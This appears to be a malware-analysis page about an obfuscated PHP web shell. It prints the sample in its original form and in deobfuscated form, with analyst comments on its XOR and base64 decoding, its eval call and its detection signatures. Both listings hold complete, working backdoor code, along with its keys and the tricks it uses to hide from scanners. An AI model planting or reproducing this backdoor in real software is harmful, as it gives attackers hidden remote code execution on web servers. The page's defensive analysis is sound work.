PHP Malware Analysis


Tags

Encoding
base64_decode
base64_encode
Execution
eval
Input
_GET

Deobfuscated code

<?php

// Analyst note (static reading only): $F, $p, $j, $P, $G, $s, $E and $l each hold
// a slice of one PHP payload, padded with the filler token "A<" so that no single
// string contains a recognisable function name such as "eval" or "base64_decode".
// The original sample on this page joins them as $P.$F.$p.$s.$G.$j.$l.$E and then
// strips the filler. The filler can straddle a fragment boundary ($P ends in "A"
// and $F begins with "<"), so stripping each fragment separately does not
// reproduce the payload; strip the filler after concatenation.
$F = '<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strl';
$p = 'en($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$';
$j = '=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode(';
$P = '$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA';
// Resolved by the deobfuscator from a str_replace() call in the original sample.
// create_function() compiles a string into a callable, so it acts as an eval sink.
$U = "create_function";
$G = 'cA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<';
$s = 'j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_mat';
$E = 'se6A<4_encA<ode(A<@A<x(@gzcompA<resA<s($o),$k)A<);print(A<"A<$p$kh$r$kf");}';
$l = '$mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();$r=@ba';
// The reassembled payload as a plain string, with the filler already removed.
// The closure that follows this assignment appears to be the same code in
// pretty-printed form; nothing in this listing passes $i to a function.
$i = "\$k=\"eea445c2\";\$kh=\"a063b6a58c4e\";\$kf=\"bc83e72cfec1\";\$p=\"X82pUNLVe0K1J97g\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
// Analyst note (static reading only): this closure is the decoded payload, a
// request-driven code-execution backdoor. It takes its input from the raw request
// body (php://input); no $_GET access appears in this listing even though the
// page tags list _GET. Every call is prefixed with "@", so failures produce no
// PHP warnings and are unlikely to show up in the PHP error log.
$Q = function () {
    // XOR key applied to both the inbound payload and the outbound result.
    $k = "eea445c2";
    // Marker strings that bracket the encoded data in the request and in the response.
    $kh = "a063b6a58c4e";
    $kf = "bc83e72cfec1";
    // Fixed prefix printed before the response envelope.
    // NOTE(review): $k, $kh, $kf and $p are the values in this sample; whether other
    // samples of the same family reuse them is not shown here — confirm before
    // relying on them as family-wide signatures.
    $p = "X82pUNLVe0K1J97g";
    // Repeating-key XOR of $t with $k; applying it twice with the same key
    // returns the input, so one routine serves for decoding and encoding.
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        // Outer loop walks the whole of $t; inner loop restarts the key index
        // at 0 each time the key has been used up.
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    // Only acts when the request body contains data between the two markers;
    // any other request falls through without output from this block.
    if (@preg_match("/a063b6a58c4e(.+)bc83e72cfec1/", @file_get_contents("php://input"), $m) == 1) {
        // Buffer output so whatever the evaluated code prints can be captured.
        @ob_start();
        // Decode chain: base64 -> XOR with $k -> zlib inflate -> eval.
        // The evaluated code is whatever the requester sent in the body.
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        // Reverse chain for the reply: zlib deflate -> XOR with $k -> base64.
        $r = @base64_encode(@x(@gzcompress($o), $k));
        // Response body is prefix + header marker + encoded result + footer marker.
        // The same marker pair therefore appears in request and response bodies,
        // which makes it usable as a content match in web/proxy log review.
        print "{$p}{$kh}{$r}{$kf}";
    }
};
// Runs the payload on every request that loads the file.
$Q();


Original code

<?php
// Analyst note (static reading only): the sample as found. Eight short variables
// hold slices of one payload, each padded with the filler token "A<" so that
// function names such as "eval", "base64_decode" and "file_get_contents" never
// appear intact in the file.
$F='<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strl';
$p='en($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$';
$j='=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode(';
$P='$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA';
// Stripping "jZ" yields the string "create_function"; the name is assembled at
// runtime so a plain text search for it does not match this file.
$U=str_replace('jZ','','crejZatjZe_jZfujZnjZctjZion');
$G='cA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<';
$s='j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_mat';
$E='se6A<4_encA<ode(A<@A<x(@gzcompA<resA<s($o),$k)A<);print(A<"A<$p$kh$r$kf");}';
$l='$mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();$r=@ba';
// Fragments are joined in this fixed order and the filler is removed from the
// concatenation (the filler can straddle a fragment boundary, e.g. $P ends in
// "A" and $F begins with "<").
$i=str_replace('A<','',$P.$F.$p.$s.$G.$j.$l.$E);
// $U('', $i) is create_function with an empty argument list and the payload as
// body; the result is invoked immediately. create_function() and the $t{$i}
// offset syntax used inside the payload were both removed in PHP 8.0, so this
// sample as written depends on an older interpreter.
// Static-scan traits visible here: a function name built with str_replace(), a
// variable function called with '' as first argument, and runs of one-letter
// variables holding quoted code fragments.
$Q=$U('',$i);$Q();
?>